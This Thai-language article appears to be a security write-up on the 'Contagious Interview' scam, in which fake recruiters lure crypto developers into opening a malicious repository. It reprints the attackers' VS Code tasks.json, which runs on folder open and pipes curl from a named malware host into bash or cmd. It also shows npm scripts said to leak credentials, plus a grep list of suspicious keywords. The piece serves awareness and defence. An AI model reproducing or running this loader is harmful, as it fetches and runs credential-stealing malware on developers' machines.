Contagious Interview: วิธีที่รีครูทเตอร์ปลอมแฮ็กนักพัฒนา

บทสรุป: คลื่นลูกใหม่ของการโจมตีที่ได้รับการสนับสนุนจากรัฐกำลังถล่มนักพัฒนาชั้นนำในวงการคริปโต สแกมเมอร์สวมรอยเป็นรีครูทเตอร์หรือ CTO และบีบให้ผู้สมัครเปิดโค้ดอันตราย บทความนี้วิเคราะห์เคส "Martin Erazo", การเจาะผ่าน "tasks.json" ใน VS Code และ "Burn Protocol" ที่จำเป็นเพื่อความอยู่รอด

ข้อจำกัดความรับผิดชอบ: บทความนี้รายงานเหตุการณ์ความปลอดภัยไซเบอร์ที่เกี่ยวข้องกับการแอบอ้างบุคคลจริง ชื่อ "Martin Erazo" และ "Ara Vartanian" อ้างถึงตัวตนที่ผู้โจมตีใช้ เราเชื่อว่าบุคคลจริงที่มีชื่อเหล่านี้เป็นเหยื่อผู้บริสุทธิ์จากการถูกขโมยอัตลักษณ์และไม่มีส่วนเกี่ยวข้องกับกิจกรรมที่เป็นอันตราย

---

---

1. เหยื่อที่สมบูรณ์แบบ: ตัวตน "Martin Erazo"

มันเริ่มต้นด้วยข้อความที่กดปุ่มถูกใจทุกอย่างสำหรับ Dev ระดับซีเนียร์:

• Role: CTO / Lead Architect
• Budget: $6M funding secured
• Tech: Web3, AI, Decentralized Infra

ในการโจมตีที่ได้รับการยืนยันเมื่อเร็วๆ นี้ รีครูทเตอร์ชื่อ "Martin Erazo" ติดต่อมาทาง LinkedIn โปรไฟล์ใช้ชื่อและรูปของผู้กำกับละครเวทีตัวจริง แต่ประวัติการทำงานเป็นของปลอมและเปลี่ยนกะทันหันเป็น "IT Project Management" ในปี 2025 - สัญญาณคลาสสิกของ บัญชีที่ถูกแฮ็กหรือซื้อมา

การสแกมดำเนินไปอย่างรวดเร็ว พวกเขาข้ามการคัดกรอง HR มาตรฐานและกระโดดไปที่ "Technical Interview" กับผู้บริหารระดับสูงทันที - ในกรณีนี้คือการสวมรอยเป็น CTO ตัวจริงในวงการ Ara Vartanian (ปัจจุบันอยู่ที่ Limit Break)

ธงแดง: ชื่อโปรเจกต์เปลี่ยนไปเรื่อยๆ รีครูทเตอร์ขาย "Betfin" (แพลตฟอร์ม GameFi) แต่เด็ค (Deck) ที่ส่งมาเป็นของ "SpaceXView" (โปรเจกต์ Metaverse) ความไม่ตรงกันนี้เป็นเบาะแสว่าสแกมเมอร์กำลังนำทรัพย์สินมาหมุนเวียนใช้ระหว่างแคมเปญต่างๆ

2. กับดัก: "ช่วยดูโค้ด MVP ของเราหน่อย"

"CTO" ตัวปลอมอ้างว่าต้องการสายตาผู้เชี่ยวชาญของคุณมาตรวจสอบโค้ด MVP (Minimum Viable Product) ของพวกเขา พวกเขาส่งลิงก์ GitHub Repo หรือไฟล์ ZIP มาให้ และกดดันให้คุณเปิดมัน ระหว่าง การสัมภาษณ์หรือทันทีหลังจากนั้น

นี่คือจุดที่การโจมตีเกิดขึ้น

พวกเขาใช้ประโยชน์จากความเต็มใจที่จะช่วยและอีโก้ของคุณ คุณคิดว่าคุณกำลังหาบั๊กในคอมโพเนนต์ React ในความเป็นจริง บั๊กคือ "ฟีเจอร์" ที่ออกแบบมาเพื่อขโมยเงินเก็บของคุณ

3. การเจาะระบบทางเทคนิค: Zero-Click Malware

ผู้โจมตีใช้ช่องโหว่ "zero-click" หรือ "low-click" ที่เล็งเป้าเครื่องมือ Dev พวกเขาไม่จำเป็นต้องให้คุณรันแอป แค่ให้คุณ เปิดโฟลเดอร์ ก็พอ

หลักฐานมัดตัว: .vscode/tasks.json

ในกรณีเฉพาะนี้ Repo มีไฟล์ .vscode/tasks.json ที่ "วางระเบิด" ไว้ ไฟล์นี้บอก VS Code ว่าจะ build โปรเจกต์อย่างไร

โค้ดอันตราย:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": นี่คือไกปืนสังหาร ทันทีที่คุณเปิดโฟลเดอร์ใน VS Code งานนี้จะทำงานอัตโนมัติ
• Payload: ใช้ curl ดาวน์โหลดสคริปต์จาก vscodesettingtask.vercel.app - โฮสต์มัลแวร์ที่รู้จักกันดีซึ่งปลอมตัวเป็น API การตั้งค่า
• ผลลัพธ์: สคริปต์ทำงานในหน่วยความจำและขโมยรหัสผ่าน Chrome, คุกกี้เซสชัน และคีย์ SSH ทันที

Plan B: package.json scripts

ถ้าการเจาะ VS Code ล้มเหลว พวกเขาก็มีสคริปต์ npm:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

การรัน npm install หรือ npm start จะเปิดใช้งาน server/server.js - สคริปต์ C2 (Command and Control) ภายในเครื่องที่รั่วไหล Environment Variables ของคุณ (คีย์ AWS, Seed ของกระเป๋า) ไปยังผู้โจมตี

4. ธงแดง vs ธงเขียว

จะสังเกตอย่างไรก่อนจะสายเกินไป?

ถ้าคุณเป็น Dev "Private Repo" หรือไฟล์ ZIP ควรทำให้เกิดสัญญาณเตือนภัยระดับสูงสุด บริษัทที่ถูกต้องใช้ Public Repo หรือ Tasks ทดสอบผ่านแพลตฟอร์มมาตรฐาน

คำเตือน: นี่ไม่ใช่วิธีเดียวในการโจมตี Dev อ่านเกี่ยวกับ The Collaborator Trap ใน Discord และวิธีที่ Supply Chain Attacks ทำให้ Dependencies ไม่ปลอดภัย

5. Security Protocol: สัมภาษณ์อย่างไรให้ปลอดภัย

ถ้าคุณเป็น Senior Dev คุณ จะ ถูกล่า การทำให้สภาพแวดล้อมแข็งแกร่งเป็นสิ่งจำเป็น

Protocol 1: "Burner" Environment

อย่า ใช้ Workstation หลักของคุณสำหรับการทดสอบโค้ด

• Virtual Machines: ใช้ VirtualBox หรือ VMWare
• Cloud Dev Environments: ใช้ GitHub Codespaces หรือ Gitpod พวกนี้มีอายุสั้นและแยกขาดจากไฟล์กระเป๋าเงินในเครื่องของคุณ

Protocol 2: Forensic Audit

ก่อนเปิดโค้ดที่ไม่คุ้นเคย:

1. เช็ค .vscode/tasks.json: มองหา runOn: folderOpen
2. เช็ค package.json: มองหา preinstall หรือ postinstall scripts ที่น่าสงสัย
3. Keyword Search: grep หา curl, wget, os.homedir(), .ssh, wallet

Protocol 3: VS Code Hardening

ปิด "Workspace Trust" ทั่วโลก

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
• สิ่งนี้จะบังคับให้ VS Code ขออนุญาตก่อนรันงานระดับโฟลเดอร์ใดๆ

6. ทางแก้: "Burn Protocol"

ถ้าคุณเปิด Repo อันตรายไปแล้ว (เช่นที่ส่งโดยตัวตน "Martin Erazo") ให้ถือว่าคุณโดนเจาะแล้ว การ Rollback ไม่เพียงพอ

1. ตัดการเชื่อมต่อ: ดึงสาย LAN ทันที
2. Burn Wallets: Private Keys ของคุณรั่วไหลแล้ว สร้าง กระเป๋าใหม่ บนอุปกรณ์ที่สะอาด (โทรศัพท์) และโอนเงินที่เหลือไป อย่าใช้ Seed เก่าอีก
3. Kill Sessions: ล็อกเอาต์จากทุกอุปกรณ์ใน Google, GitHub, AWS ยกเลิกเซสชันที่ใช้งานอยู่ทั้งหมด
4. Audit SSH Keys: เช็คการตั้งค่า GitHub/GitLab ผู้โจมตีมักจะเพิ่มคีย์ SSH ของพวกเขา เพื่อรักษา Backdoor access ลบสิ่งที่คุณไม่รู้จัก
5. Nuke It: ล้างดิสก์และลง OS ใหม่ นี่เป็นวิธีเดียวที่จะมั่นใจ 100% ว่า Rootkits หายไป

บทสรุป

สแกม "Contagious Interview" ใช้อาวุธคือความเชี่ยวชาญของคุณเอง มันเล็งเป้าความปรารถนาที่จะแก้ปัญหาของคุณ แต่ใน Web3 ความหวาดระแวงคือคุณธรรมทางวิชาชีพ ตรวจสอบทุกตัวตน Sandbox ทุก Repo และอย่าไว้ใจ "รีครูทเตอร์" ที่เร่งให้คุณรันโค้ด